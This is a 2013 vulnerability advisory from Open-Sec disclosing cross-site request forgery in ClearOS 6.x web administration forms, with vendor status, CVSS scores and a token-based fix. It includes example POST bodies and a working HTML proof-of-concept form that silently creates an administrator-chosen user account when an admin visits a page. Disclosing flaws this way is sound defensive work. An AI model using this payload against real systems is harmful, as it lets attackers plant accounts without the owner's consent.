viernes, 11 de enero de 2013

Advisory CSRF-ClearOS 10012013


Advisory ID: OS002

Product: ClearOS
Created by: Clear Foundation (http://www.clearfoundation.com/Foundation/core-team-honor-roll.html)
Vulnerable Version(s): 6.X.X
Tested Version: 6.1.0 - 6.3.0

Vulnerability Type: Cross-Site Request Forgery (CSRF) [CWE-352]
Public Disclosure : No yet
Vendor status : Notified
Vendor Answer : "We expect these to be resolved for the ClearOS 6.4.0 Beta 2 (due later this month)."

CVSS Base Score: 5.8
CVSS Temporal Score: 4.8
CVSS Environmental Score: 4.8

Researcher: Camilo Galdos, Security Consultant @ Open-sec ( http://www.open-sec.com/ )

Advisory Details :

Camilo Galdos, Security Consultant at Open-Sec discovered a vulnerability in ClearOS, which can be exploited to remotely add accounts to the ClearOS system by making the Administrator access a link.

Vulnerability Description: Cross-Site Request Forgery (CSRF) in ClearOS:

90% of the forms in ClearOS and Modules do not use a Token to correctly verify if the form is being send by the administrator or user in ClearOS.
Examples of URLs that lead to exploit this vulnerability are:

https://127.0.0.1:81/app/users/edit/get

POST:

user_info%5Bcore%5D%5Busername%5D=get&user_info%5Bcore%5D%5Bfirst_name%5D=Get&user_info%5Bcore%5D%5Blast_name%5D=ClearOS&password=clear&verify=clear&user_info%5Bplugins%5D%5Bftp%5D%5Bstate%5D=0&user_info%5Bplugins%5D%5Bopenvpn%5D%5Bstate%5D=0&user_info%5Bplugins%5D%5Bpptpd%5D%5Bstate%5D=0&user_info%5Bplugins%5D%5Bprint_server%5D%5Bstate%5D=0&user_info%5Bplugins%5D%5Bsmtp%5D%5Bstate%5D=0&user_info%5Bplugins%5D%5Buser_certificates%5D%5Bstate%5D=0&user_info%5Bplugins%5D%5Bweb_proxy%5D%5Bstate%5D=0&user_info%5Bextensions%5D%5Bshell%5D%5Blogin_shell%5D=%2Fsbin%2Fnologin&submit=Update


https://127.0.0.1:81/app/users/add

POST:
user_info%5Bcore%5D%5Busername%5D=usernametest&user_info%5Bcore%5D%5Bfirst_name%5D=firstnametest&user_info%5Bcore%5D%5Blast_name%5D=lastnametest&password=l0l123&verify=l0l123&user_info%5Bplugins%5D%5Bweb_proxy%5D%5Bstate%5D=1&submit=Add

Exploit:

<html>
<title>CSRF ClearOS</title>
<h1>CSRF ClearOS ~ Open-Sec</h1>

<form name="lol" id="lol" class="theme-form" action="https://192.168.1.40:81/app/users/add" method="post" accept-charset="utf-8" autocomplete="off">
<input type="hidden" name="user_info[core][username]" value="Dedalo"/>
<input type="hidden" name="user_info[core][first_name]" value="Camilo"/>
<input type="hidden" name="user_info[core][last_name]" value="Galdos"/>
<input type="hidden" name="password" value="p455w0rd"/>
<input type="hidden" name="verify" value="p455w0rd"/>
<input type="submit" name="submit" value="Add"/>
</form>
</html>


Impact: Administrators can be scammed to visit a link and when they visit it they automaticaly create a new user or edit a user or change a password or anything that is in a form because almost no form has a token to validate.

Solution:

To fix this kind of vulnerability (CSRF) you must put an authentication token in every form to validate that the form is being sent from an specified module or page. Owasp have different examples in different Programming Languages so you can take one in example to patch this vulnerability.

https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet


Contact Information: For additional details, feel free to contact Camilo Galdos at cgaldos[at]open-sec.com


About Open-Sec:

Open-Sec is a Perú based company focused on penetration testing and security incidents investigation services. With customers at Perú, Ecuador, Panamá and Honduras, Open-Sec provides consulting services through a team of certified and experienced consultants.

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible.